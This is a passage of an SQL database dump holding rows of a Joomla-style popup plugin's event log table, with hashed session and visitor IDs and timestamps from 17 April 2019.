(79344, 'f3373dc846571b6cf26ee0112979cb37', 'f10990f26adcd1c5', 0, 2, 1, '2019-04-17 17:11:11'),
(79345, 'e46de991bdbbdaa512ea081a1837a484', '390c8ebb4f0af7ce', 0, 2, 1, '2019-04-17 17:11:21'),
(79346, 'e1d071c6e4de36b52377f4c9c9d5eb5c', 'e3413f2163c4f64a', 0, 2, 1, '2019-04-17 17:11:22'),
(79347, '2e5a79b40d8af54b887d1474b3e7a57f', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-17 17:11:25'),
(79348, 'c6bf6057d09a20dfc0c374f5a2ebff22', '7501b42c35accff7', 0, 2, 1, '2019-04-17 17:11:29'),
(79349, 'c5d6a0a9c88c4bf619561081cb612b42', '5d5c6e272bdea80c', 0, 2, 1, '2019-04-17 17:11:30'),
(79350, '60122acd7ef7d92bfc452498dd226095', '78999c8a41a6da3c', 0, 2, 1, '2019-04-17 17:11:32'),
(79351, '1cea95c048e5e5bb65fe7f5bba87803f', '32b169e936bbe5df', 0, 2, 1, '2019-04-17 17:11:33'),
(79352, '48ce9f83017e7c2ff37091bfa5c88fea', '1267050fbb458315', 0, 2, 1, '2019-04-17 17:11:36'),
(79353, 'a06ff3b7da03ac815af7d120dfbfa484', '6eaef0e2df5f44f7', 0, 2, 1, '2019-04-17 17:11:40'),
(79354, '2e5a79b40d8af54b887d1474b3e7a57f', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-17 17:11:44'),
(79355, 'e46de991bdbbdaa512ea081a1837a484', '390c8ebb4f0af7ce', 0, 2, 1, '2019-04-17 17:11:46'),
(79356, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-17 17:11:49'),
(79357, '9b2b14ebf11c00c2b2dbb01cf79f473c', '8e9a16956483f85e', 0, 2, 1, '2019-04-17 17:11:53'),
(79358, '8683de15ea9269d447fb3bee86d477dc', 'd6b9cd5bfdd27ced', 0, 2, 1, '2019-04-17 17:11:53'),
(79359, 'c5d6a0a9c88c4bf619561081cb612b42', '5d5c6e272bdea80c', 0, 2, 1, '2019-04-17 17:11:55'),
(79360, '60122acd7ef7d92bfc452498dd226095', '78999c8a41a6da3c', 0, 2, 1, '2019-04-17 17:11:57'),
(79361, '53e62b348f35f927c5bab8a6788111be', 'dace6e0c219330fc', 0, 2, 1, '2019-04-17 17:12:00'),
(79362, 'afc9769cd70285ca00264e8b73df86b8', 'b2bafb74467116e9', 0, 2, 1, '2019-04-17 17:12:01'),
(79363, '2e5a79b40d8af54b887d1474b3e7a57f', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-17 17:12:01'),
(79364, 'bac9031a86f4cfe1385e7ef8e32a9936', 'e706e9a0184b2202', 0, 2, 1, '2019-04-17 17:12:04'),
(79365, '48ce9f83017e7c2ff37091bfa5c88fea', '1267050fbb458315', 0, 2, 1, '2019-04-17 17:12:06'),
(79366, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-17 17:12:06'),
(79367, '0f35c250ca52d3cff408f70666a47777', 'c5cb4fe55b6b1b30', 0, 2, 1, '2019-04-17 17:12:09'),
(79368, 'e46de991bdbbdaa512ea081a1837a484', '390c8ebb4f0af7ce', 0, 2, 1, '2019-04-17 17:12:09'),
(79369, '60122acd7ef7d92bfc452498dd226095', '78999c8a41a6da3c', 0, 2, 1, '2019-04-17 17:12:10'),
(79370, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-17 17:12:17'),
(79371, '2e5a79b40d8af54b887d1474b3e7a57f', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-17 17:12:27'),
(79372, '1cea95c048e5e5bb65fe7f5bba87803f', '32b169e936bbe5df', 0, 2, 1, '2019-04-17 17:12:27'),
(79373, '60122acd7ef7d92bfc452498dd226095', '78999c8a41a6da3c', 0, 2, 1, '2019-04-17 17:12:30'),
(79374, '53e62b348f35f927c5bab8a6788111be', 'dace6e0c219330fc', 0, 2, 1, '2019-04-17 17:12:32'),
(79375, '9b2b14ebf11c00c2b2dbb01cf79f473c', '8e9a16956483f85e', 0, 2, 1, '2019-04-17 17:12:32'),
(79376, 'afc9769cd70285ca00264e8b73df86b8', 'b2bafb74467116e9', 0, 2, 1, '2019-04-17 17:12:36'),
(79377, '48ce9f83017e7c2ff37091bfa5c88fea', '1267050fbb458315', 0, 2, 1, '2019-04-17 17:12:39'),
(79378, '4268bbc09eddb53548e1cd1f5096d7d1', 'c7d4ce8b0de12339', 0, 2, 1, '2019-04-17 17:12:40'),
(79379, '2e5a79b40d8af54b887d1474b3e7a57f', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-17 17:12:45'),
(79380, 'bac9031a86f4cfe1385e7ef8e32a9936', 'e706e9a0184b2202', 0, 2, 1, '2019-04-17 17:12:50'),
(79381, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-17 17:12:52'),
(79382, '53e62b348f35f927c5bab8a6788111be', 'dace6e0c219330fc', 0, 2, 1, '2019-04-17 17:12:55'),
(79383, '246e0cbe2aed07e59b6c6ea0d1efa257', '846dcc220c9d1cd7', 0, 2, 1, '2019-04-17 17:12:56'),
(79384, 'e46de991bdbbdaa512ea081a1837a484', '390c8ebb4f0af7ce', 0, 2, 1, '2019-04-17 17:12:59'),
(79385, '02cee0da7a4bc4e297c52bc0e99c7960', '87e2978d1d3d1a07', 0, 2, 1, '2019-04-17 17:13:05'),
(79386, '60122acd7ef7d92bfc452498dd226095', '78999c8a41a6da3c', 0, 2, 1, '2019-04-17 17:13:08'),
(79387, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-17 17:13:08'),
(79388, '2e5a79b40d8af54b887d1474b3e7a57f', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-17 17:13:17'),
(79389, 'bf663f72d252df33947a1950e3afa9ca', '9bd6c23c7090db5b', 0, 2, 1, '2019-04-17 17:13:20'),
(79390, '72cf86cb99ed47c75efc9e995386b0e1', '92127ae1b4d5b310', 0, 2, 1, '2019-04-17 17:13:23'),
(79391, 'c6bf6057d09a20dfc0c374f5a2ebff22', '7501b42c35accff7', 0, 2, 1, '2019-04-17 17:13:28'),
(79392, 'd989b840f8898d327bca7c83743721eb', '1c68b977b911188c', 0, 2, 1, '2019-04-17 17:13:29'),
(79393, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-17 17:13:35'),
(79394, '7fbb5383d78535794f5aa5290f0e4e85', 'edfe950d47379572', 0, 2, 1, '2019-04-17 17:13:35'),
(79395, '4cfb6ed321120ae9a9b1dde257b1df5e', 'cc4c76a65329df3e', 0, 2, 1, '2019-04-17 17:13:35'),
(79396, '4268bbc09eddb53548e1cd1f5096d7d1', 'c7d4ce8b0de12339', 0, 2, 1, '2019-04-17 17:13:36'),
(79397, '48ce9f83017e7c2ff37091bfa5c88fea', '1267050fbb458315', 0, 2, 1, '2019-04-17 17:13:37'),
(79398, 'bf663f72d252df33947a1950e3afa9ca', '9bd6c23c7090db5b', 0, 2, 1, '2019-04-17 17:13:37'),
(79399, '2e5a79b40d8af54b887d1474b3e7a57f', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-17 17:13:39'),
(79400, '4cfb6ed321120ae9a9b1dde257b1df5e', 'cc4c76a65329df3e', 0, 2, 1, '2019-04-17 17:13:45'),
(79401, '7fbb5383d78535794f5aa5290f0e4e85', 'edfe950d47379572', 0, 2, 1, '2019-04-17 17:13:46'),
(79402, '60122acd7ef7d92bfc452498dd226095', '78999c8a41a6da3c', 0, 2, 1, '2019-04-17 17:13:49'),
(79403, '48ce9f83017e7c2ff37091bfa5c88fea', '1267050fbb458315', 0, 2, 1, '2019-04-17 17:13:51'),
(79404, '7fbb5383d78535794f5aa5290f0e4e85', 'edfe950d47379572', 0, 2, 1, '2019-04-17 17:13:51'),
(79405, 'c50bdb6c88d090ba1e361a06af51e2f0', '503a514a8daa32a7', 0, 2, 1, '2019-04-17 17:13:53'),
(79406, '1cea95c048e5e5bb65fe7f5bba87803f', '32b169e936bbe5df', 0, 2, 1, '2019-04-17 17:14:06'),
(79407, 'df38b3b75f857da0c72c5a5691960ec9', 'b512fd170584454c', 0, 2, 1, '2019-04-17 17:14:11'),
(79408, '2e5a79b40d8af54b887d1474b3e7a57f', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-17 17:14:13'),
(79409, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-17 17:14:14'),
(79410, '53e62b348f35f927c5bab8a6788111be', 'dace6e0c219330fc', 0, 2, 1, '2019-04-17 17:14:15'),
(79411, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-17 17:14:36'),
(79412, 'df38b3b75f857da0c72c5a5691960ec9', 'b512fd170584454c', 0, 2, 1, '2019-04-17 17:14:49'),
(79413, 'afc9769cd70285ca00264e8b73df86b8', 'b2bafb74467116e9', 0, 2, 1, '2019-04-17 17:14:52'),
(79414, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-17 17:14:52'),
(79415, '246e0cbe2aed07e59b6c6ea0d1efa257', '846dcc220c9d1cd7', 0, 2, 1, '2019-04-17 17:14:52'),
(79416, '2e5a79b40d8af54b887d1474b3e7a57f', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-17 17:14:56'),
(79417, '48ce9f83017e7c2ff37091bfa5c88fea', '1267050fbb458315', 0, 2, 1, '2019-04-17 17:15:06'),
(79418, 'c50bdb6c88d090ba1e361a06af51e2f0', '503a514a8daa32a7', 0, 2, 1, '2019-04-17 17:15:07'),
(79419, '2e5a79b40d8af54b887d1474b3e7a57f', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-17 17:15:08'),
(79420, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-17 17:15:08'),
(79421, '31e318be0d43c62439f9d9aa60c1f496', '1d1658c97bef6ed6', 0, 2, 1, '2019-04-17 17:15:12'),
(79422, '15770d0f79c77dc8d8e17e9ca63d94d6', '5716bfdec5db86c3', 0, 2, 1, '2019-04-17 17:15:16'),
(79423, 'bf663f72d252df33947a1950e3afa9ca', '9bd6c23c7090db5b', 0, 2, 1, '2019-04-17 17:15:24'),
(79424, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-17 17:15:25'),
(79425, '2e5a79b40d8af54b887d1474b3e7a57f', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-17 17:15:27'),
(79426, '53e62b348f35f927c5bab8a6788111be', 'dace6e0c219330fc', 0, 2, 1, '2019-04-17 17:15:28'),
(79427, 'bac9031a86f4cfe1385e7ef8e32a9936', 'e706e9a0184b2202', 0, 2, 1, '2019-04-17 17:15:30'),
(79428, '50fa286bbb92808523e417562b14a0b9', '6396099bdbc7b168', 0, 2, 1, '2019-04-17 17:15:32'),
(79429, 'b6464e4811689397ac70a5e83a06d406', '7edff10c327f64f4', 0, 2, 1, '2019-04-17 17:15:33'),
(79430, '2e5a79b40d8af54b887d1474b3e7a57f', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-17 17:15:35'),
(79431, '72cf86cb99ed47c75efc9e995386b0e1', '92127ae1b4d5b310', 0, 2, 1, '2019-04-17 17:15:38'),
(79432, '32cfda8e4f2f7f093790230d509d85e8', '74aba437eea39f30', 0, 2, 1, '2019-04-17 17:15:46'),
(79433, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-17 17:15:47'),
(79434, '15770d0f79c77dc8d8e17e9ca63d94d6', '5716bfdec5db86c3', 0, 2, 1, '2019-04-17 17:15:50'),
(79435, 'df2d7af98dc1a2cd9754068108746663', 'f19010d8a5f137d0', 0, 2, 1, '2019-04-17 17:15:51'),
(79436, '31e318be0d43c62439f9d9aa60c1f496', '1d1658c97bef6ed6', 0, 2, 1, '2019-04-17 17:15:57'),
(79437, '2e5a79b40d8af54b887d1474b3e7a57f', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-17 17:15:59'),
(79438, 'c5d6a0a9c88c4bf619561081cb612b42', '5d5c6e272bdea80c', 0, 2, 1, '2019-04-17 17:16:02'),
(79439, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-17 17:16:04'),
(79440, '1cea95c048e5e5bb65fe7f5bba87803f', '32b169e936bbe5df', 0, 2, 1, '2019-04-17 17:16:05'),
(79441, 'c6bf6057d09a20dfc0c374f5a2ebff22', '7501b42c35accff7', 0, 2, 1, '2019-04-17 17:16:12'),
(79442, '2f14402c88c60b1993a1e611b3936006', '1e8786f2f88c192b', 0, 2, 1, '2019-04-17 17:16:12'),
(79443, '31e318be0d43c62439f9d9aa60c1f496', '1d1658c97bef6ed6', 0, 2, 1, '2019-04-17 17:16:15'),
(79444, '53e62b348f35f927c5bab8a6788111be', 'dace6e0c219330fc', 0, 2, 1, '2019-04-17 17:16:17'),
(79445, '48ce9f83017e7c2ff37091bfa5c88fea', '1267050fbb458315', 0, 2, 1, '2019-04-17 17:16:19'),
(79446, 'b6464e4811689397ac70a5e83a06d406', '7edff10c327f64f4', 0, 2, 1, '2019-04-17 17:16:23'),
(79447, '15770d0f79c77dc8d8e17e9ca63d94d6', '5716bfdec5db86c3', 0, 2, 1, '2019-04-17 17:16:26'),
(79448, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-17 17:16:26'),
(79449, '2e5a79b40d8af54b887d1474b3e7a57f', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-17 17:16:27'),
(79450, '72cf86cb99ed47c75efc9e995386b0e1', '92127ae1b4d5b310', 0, 2, 1, '2019-04-17 17:16:30'),
(79451, '32cfda8e4f2f7f093790230d509d85e8', '74aba437eea39f30', 0, 2, 1, '2019-04-17 17:16:36'),
(79452, '41be8c5bd3f59df480bc05a33f2651a1', 'df27b9a2919a8206', 0, 2, 1, '2019-04-17 17:16:37'),
(79453, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-17 17:16:40'),
(79454, '246e0cbe2aed07e59b6c6ea0d1efa257', '846dcc220c9d1cd7', 0, 2, 1, '2019-04-17 17:16:44'),
(79455, 'eba80a28030b0686dd6175d1c65abcba', '196ae7616c94df27', 0, 2, 1, '2019-04-17 17:16:44'),
(79456, '31e318be0d43c62439f9d9aa60c1f496', '1d1658c97bef6ed6', 0, 2, 1, '2019-04-17 17:16:46'),
(79457, '41be8c5bd3f59df480bc05a33f2651a1', 'df27b9a2919a8206', 0, 2, 1, '2019-04-17 17:16:52'),
(79458, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-17 17:16:53'),
(79459, '2e5a79b40d8af54b887d1474b3e7a57f', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-17 17:17:02'),
(79460, 'c6bf6057d09a20dfc0c374f5a2ebff22', '7501b42c35accff7', 0, 2, 1, '2019-04-17 17:17:05'),
(79461, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-17 17:17:09'),
(79462, '32cfda8e4f2f7f093790230d509d85e8', '74aba437eea39f30', 0, 2, 1, '2019-04-17 17:17:11'),
(79463, '15770d0f79c77dc8d8e17e9ca63d94d6', '5716bfdec5db86c3', 0, 2, 1, '2019-04-17 17:17:16'),
(79464, 'b6464e4811689397ac70a5e83a06d406', '7edff10c327f64f4', 0, 2, 1, '2019-04-17 17:17:19'),
(79465, '2e5a79b40d8af54b887d1474b3e7a57f', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-17 17:17:28'),
(79466, '31e318be0d43c62439f9d9aa60c1f496', '1d1658c97bef6ed6', 0, 2, 1, '2019-04-17 17:17:29'),
(79467, '48ce9f83017e7c2ff37091bfa5c88fea', '1267050fbb458315', 0, 2, 1, '2019-04-17 17:17:36'),
(79468, '41be8c5bd3f59df480bc05a33f2651a1', 'df27b9a2919a8206', 0, 2, 1, '2019-04-17 17:17:45'),
(79469, 'd215e18df1361fcf1ae85692547fe3de', '2034f09284a4c7ca', 0, 2, 1, '2019-04-17 17:18:09'),
(79470, 'c6bf6057d09a20dfc0c374f5a2ebff22', '7501b42c35accff7', 0, 2, 1, '2019-04-17 17:18:22'),
(79471, '48ce9f83017e7c2ff37091bfa5c88fea', '1267050fbb458315', 0, 2, 1, '2019-04-17 17:18:45'),
(79472, '60122acd7ef7d92bfc452498dd226095', '78999c8a41a6da3c', 0, 2, 1, '2019-04-17 17:18:46'),
(79473, '41be8c5bd3f59df480bc05a33f2651a1', 'df27b9a2919a8206', 0, 2, 1, '2019-04-17 17:18:53'),
(79474, '1fab8b05a08033292d53f44aacbbd0e6', '863b661787591b2d', 0, 2, 1, '2019-04-17 17:19:09'),
(79475, '2e5a79b40d8af54b887d1474b3e7a57f', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-17 17:19:18'),
(79476, '0f35c250ca52d3cff408f70666a47777', 'c5cb4fe55b6b1b30', 0, 2, 1, '2019-04-17 17:19:23'),
(79477, 'e1d071c6e4de36b52377f4c9c9d5eb5c', 'e3413f2163c4f64a', 0, 2, 1, '2019-04-17 17:19:29'),
(79478, '2e5a79b40d8af54b887d1474b3e7a57f', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-17 17:19:54'),
(79479, '31e318be0d43c62439f9d9aa60c1f496', '1d1658c97bef6ed6', 0, 2, 1, '2019-04-17 17:20:05'),
(79480, '2e5a79b40d8af54b887d1474b3e7a57f', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-17 17:20:17'),
(79481, '800917cd9b87bce55cbec14d1f036ea2', '22905843105c275f', 0, 2, 1, '2019-04-17 17:20:19'),
(79482, '8683de15ea9269d447fb3bee86d477dc', 'd6b9cd5bfdd27ced', 0, 2, 1, '2019-04-17 17:20:26'),
(79483, '50fa286bbb92808523e417562b14a0b9', '6396099bdbc7b168', 0, 2, 1, '2019-04-17 17:20:28'),
(79484, '2e5a79b40d8af54b887d1474b3e7a57f', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-17 17:20:31'),
(79485, '8eaa8ec5f41113426d61600747787b73', 'd2cb60ef4a945d99', 0, 2, 1, '2019-04-17 17:20:38'),
(79486, '50fa286bbb92808523e417562b14a0b9', '6396099bdbc7b168', 0, 2, 1, '2019-04-17 17:20:41'),
(79487, '2e5a79b40d8af54b887d1474b3e7a57f', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-17 17:20:45'),
(79488, '1cea95c048e5e5bb65fe7f5bba87803f', '32b169e936bbe5df', 0, 2, 1, '2019-04-17 17:20:47'),
(79489, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-17 17:20:49'),
(79490, '48ce9f83017e7c2ff37091bfa5c88fea', '1267050fbb458315', 0, 2, 1, '2019-04-17 17:20:51'),
(79491, '8683de15ea9269d447fb3bee86d477dc', 'd6b9cd5bfdd27ced', 0, 2, 1, '2019-04-17 17:20:51'),
(79492, 'c6bf6057d09a20dfc0c374f5a2ebff22', '7501b42c35accff7', 0, 2, 1, '2019-04-17 17:20:54'),
(79493, '2e5a79b40d8af54b887d1474b3e7a57f', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-17 17:20:54'),
(79494, '50fa286bbb92808523e417562b14a0b9', '6396099bdbc7b168', 0, 2, 1, '2019-04-17 17:20:57'),
(79495, '0f35c250ca52d3cff408f70666a47777', 'c5cb4fe55b6b1b30', 0, 2, 1, '2019-04-17 17:21:01'),
(79496, '246e0cbe2aed07e59b6c6ea0d1efa257', '846dcc220c9d1cd7', 0, 2, 1, '2019-04-17 17:21:08'),
(79497, '31541c3c9ff92315e97809166e293241', 'd7c14cfa379ac614', 0, 2, 1, '2019-04-17 17:21:10'),
(79498, '3063600540df79bb14da3b91087b34e2', '0a3c059ff9af6559', 0, 2, 1, '2019-04-17 17:21:11'),
(79499, 'c6bf6057d09a20dfc0c374f5a2ebff22', '7501b42c35accff7', 0, 2, 1, '2019-04-17 17:21:13'),
(79500, 'bac9031a86f4cfe1385e7ef8e32a9936', 'e706e9a0184b2202', 0, 2, 1, '2019-04-17 17:21:14'),
(79501, '48ce9f83017e7c2ff37091bfa5c88fea', '1267050fbb458315', 0, 2, 1, '2019-04-17 17:21:14'),
(79502, '9470527cecb0b3406ff8ce7fc1e0d480', '402692e46d0378b1', 0, 2, 1, '2019-04-17 17:21:25');
INSERT INTO `y57u5_rstbox_logs` (`id`, `sessionid`, `visitorid`, `user`, `box`, `event`, `date`) VALUES
(79503, '1cea95c048e5e5bb65fe7f5bba87803f', '32b169e936bbe5df', 0, 2, 1, '2019-04-17 17:21:30'),
(79504, '1569d1fb64b12f5206eec3b304c27627', 'e9f4076e834ba7fe', 0, 2, 1, '2019-04-17 17:21:36'),
(79505, '2e5a79b40d8af54b887d1474b3e7a57f', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-17 17:21:41'),
(79506, 'bf663f72d252df33947a1950e3afa9ca', '9bd6c23c7090db5b', 0, 2, 1, '2019-04-17 17:21:44'),
(79507, '48ce9f83017e7c2ff37091bfa5c88fea', '1267050fbb458315', 0, 2, 1, '2019-04-17 17:21:52'),
(79508, 'c6bf6057d09a20dfc0c374f5a2ebff22', '7501b42c35accff7', 0, 2, 1, '2019-04-17 17:21:54'),
(79509, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-17 17:21:54'),
(79510, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-17 17:21:59'),
(79511, '3063600540df79bb14da3b91087b34e2', '0a3c059ff9af6559', 0, 2, 1, '2019-04-17 17:22:05'),
(79512, '48ce9f83017e7c2ff37091bfa5c88fea', '1267050fbb458315', 0, 2, 1, '2019-04-17 17:22:07'),
(79513, '9470527cecb0b3406ff8ce7fc1e0d480', '402692e46d0378b1', 0, 2, 1, '2019-04-17 17:22:11'),
(79514, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-17 17:22:12'),
(79515, '02cee0da7a4bc4e297c52bc0e99c7960', '87e2978d1d3d1a07', 0, 2, 1, '2019-04-17 17:22:23'),
(79516, '48ce9f83017e7c2ff37091bfa5c88fea', '1267050fbb458315', 0, 2, 1, '2019-04-17 17:22:29'),
(79517, '3063600540df79bb14da3b91087b34e2', '0a3c059ff9af6559', 0, 2, 1, '2019-04-17 17:22:29'),
(79518, '2e5a79b40d8af54b887d1474b3e7a57f', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-17 17:22:29'),
(79519, '31e318be0d43c62439f9d9aa60c1f496', '1d1658c97bef6ed6', 0, 2, 1, '2019-04-17 17:22:34'),
(79520, '48ce9f83017e7c2ff37091bfa5c88fea', '1267050fbb458315', 0, 2, 1, '2019-04-17 17:22:43'),
(79521, '9b2b14ebf11c00c2b2dbb01cf79f473c', '8e9a16956483f85e', 0, 2, 1, '2019-04-17 17:22:46'),
(79522, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-17 17:22:53'),
(79523, '48ce9f83017e7c2ff37091bfa5c88fea', '1267050fbb458315', 0, 2, 1, '2019-04-17 17:22:58'),
(79524, 'c6bf6057d09a20dfc0c374f5a2ebff22', '7501b42c35accff7', 0, 2, 1, '2019-04-17 17:23:04'),
(79525, '0f1cc61355b458394150483a53bac546', 'db026c3d7c547818', 0, 2, 1, '2019-04-17 17:23:09'),
(79526, '48ce9f83017e7c2ff37091bfa5c88fea', '1267050fbb458315', 0, 2, 1, '2019-04-17 17:23:10'),
(79527, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-17 17:23:10'),
(79528, '3063600540df79bb14da3b91087b34e2', '0a3c059ff9af6559', 0, 2, 1, '2019-04-17 17:23:10'),
(79529, '0db5653e4d7fd2a53b1eaeb557611f90', 'c370c7e3b7ec5c92', 0, 2, 1, '2019-04-17 17:23:12'),
(79530, '9b2b14ebf11c00c2b2dbb01cf79f473c', '8e9a16956483f85e', 0, 2, 1, '2019-04-17 17:23:13'),
(79531, '4268bbc09eddb53548e1cd1f5096d7d1', 'c7d4ce8b0de12339', 0, 2, 1, '2019-04-17 17:23:16'),
(79532, '0db5653e4d7fd2a53b1eaeb557611f90', 'c370c7e3b7ec5c92', 0, 2, 1, '2019-04-17 17:23:24'),
(79533, '48ce9f83017e7c2ff37091bfa5c88fea', '1267050fbb458315', 0, 2, 1, '2019-04-17 17:23:24'),
(79534, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-17 17:23:38'),
(79535, '3063600540df79bb14da3b91087b34e2', '0a3c059ff9af6559', 0, 2, 1, '2019-04-17 17:23:50'),
(79536, 'c6bf6057d09a20dfc0c374f5a2ebff22', '7501b42c35accff7', 0, 2, 1, '2019-04-17 17:24:11'),
(79537, '2e5a79b40d8af54b887d1474b3e7a57f', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-17 17:24:20'),
(79538, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-17 17:24:27'),
(79539, 'a357984659d5aa2deb370f8887dd9853', '8d8488889bc3b923', 0, 2, 1, '2019-04-17 17:24:36'),
(79540, '800917cd9b87bce55cbec14d1f036ea2', '22905843105c275f', 0, 2, 1, '2019-04-17 17:24:43'),
(79541, '1cea95c048e5e5bb65fe7f5bba87803f', '32b169e936bbe5df', 0, 2, 1, '2019-04-17 17:24:44'),
(79542, 'a357984659d5aa2deb370f8887dd9853', '8d8488889bc3b923', 0, 2, 1, '2019-04-17 17:24:45'),
(79543, '3063600540df79bb14da3b91087b34e2', '0a3c059ff9af6559', 0, 2, 1, '2019-04-17 17:24:54'),
(79544, '628eb48f80b7283a850c26296b28eed1', 'edfe950d47379572', 0, 2, 1, '2019-04-17 17:25:23'),
(79545, '628eb48f80b7283a850c26296b28eed1', 'edfe950d47379572', 0, 2, 1, '2019-04-17 17:25:30'),
(79546, '0f1cc61355b458394150483a53bac546', 'db026c3d7c547818', 0, 2, 1, '2019-04-17 17:25:37'),
(79547, '3063600540df79bb14da3b91087b34e2', '0a3c059ff9af6559', 0, 2, 1, '2019-04-17 17:25:54'),
(79548, '31541c3c9ff92315e97809166e293241', 'd7c14cfa379ac614', 0, 2, 1, '2019-04-17 17:25:55'),
(79549, 'd989b840f8898d327bca7c83743721eb', '1c68b977b911188c', 0, 2, 1, '2019-04-17 17:26:23'),
(79550, '0ce1685a8eec2c1e6e4c2c855d9018c4', '854dd24b6beb7284', 0, 2, 1, '2019-04-17 17:26:44'),
(79551, '56ecbad36d1789436df6601a71418c79', '33089a3b34e40302', 0, 2, 1, '2019-04-17 17:27:50'),
(79552, 'c5d6a0a9c88c4bf619561081cb612b42', '5d5c6e272bdea80c', 0, 2, 1, '2019-04-17 17:28:50'),
(79553, '4cfb6ed321120ae9a9b1dde257b1df5e', 'cc4c76a65329df3e', 0, 2, 1, '2019-04-17 17:29:53'),
(79554, '4cfb6ed321120ae9a9b1dde257b1df5e', 'cc4c76a65329df3e', 0, 2, 1, '2019-04-17 17:30:03'),
(79555, 'ba0e59a1250fbdac97f40411e9dcdcc2', '23eba92cfb9af234', 0, 2, 1, '2019-04-17 17:30:29'),
(79556, '31602c6e6af301d05ef2c0fda4552561', '70df5ba7bd3f1512', 0, 2, 1, '2019-04-17 17:32:05'),
(79557, '31602c6e6af301d05ef2c0fda4552561', '70df5ba7bd3f1512', 0, 2, 1, '2019-04-17 17:32:12'),
(79558, 'bd111e47e31ab1f819ff2d23b04a45a3', 'd8923e60c6dca0dc', 0, 2, 1, '2019-04-17 17:33:42'),
(79559, 'd35705e380bb700f02fab79a8b4e60e7', '20683e7ff6f02d30', 0, 2, 1, '2019-04-17 17:33:47'),
(79560, '1cea95c048e5e5bb65fe7f5bba87803f', '32b169e936bbe5df', 0, 2, 1, '2019-04-17 17:34:05'),
(79561, '73e994dc8313dfe79c147d4f2bd102a8', 'e855c1a7bf4743dc', 0, 2, 1, '2019-04-17 17:36:12'),
(79562, '41cd8895b577ec8fab9c1f28d6720d4c', '19bcc476e66aa8b8', 0, 2, 1, '2019-04-17 17:36:40'),
(79563, '41cd8895b577ec8fab9c1f28d6720d4c', '19bcc476e66aa8b8', 0, 2, 1, '2019-04-17 17:37:00'),
(79564, '1cea95c048e5e5bb65fe7f5bba87803f', '32b169e936bbe5df', 0, 2, 1, '2019-04-17 17:39:17'),
(79565, '19e143955c05abb310c4740031782594', '8ad007cf09224cd8', 0, 2, 1, '2019-04-17 17:44:47'),
(79566, '74a54ae32b965883b18a8283f8c85b10', 'b1f252ea7d591555', 0, 2, 1, '2019-04-17 17:45:35'),
(79567, 'db3f996d465dc45cc1c90ce1fe1c2a5c', '39e871ca837dae3e', 0, 2, 1, '2019-04-17 17:45:40'),
(79568, 'f2b9eb731eb2ff026736c294899d9384', '56f2a0f7edade9d9', 0, 2, 1, '2019-04-17 17:46:52'),
(79569, 'e46de991bdbbdaa512ea081a1837a484', '390c8ebb4f0af7ce', 0, 2, 1, '2019-04-17 17:47:07'),
(79570, 'ce3780135f3d1be4bfa132740e51faa5', 'a2b92167f54c9dc2', 0, 2, 1, '2019-04-17 17:47:17'),
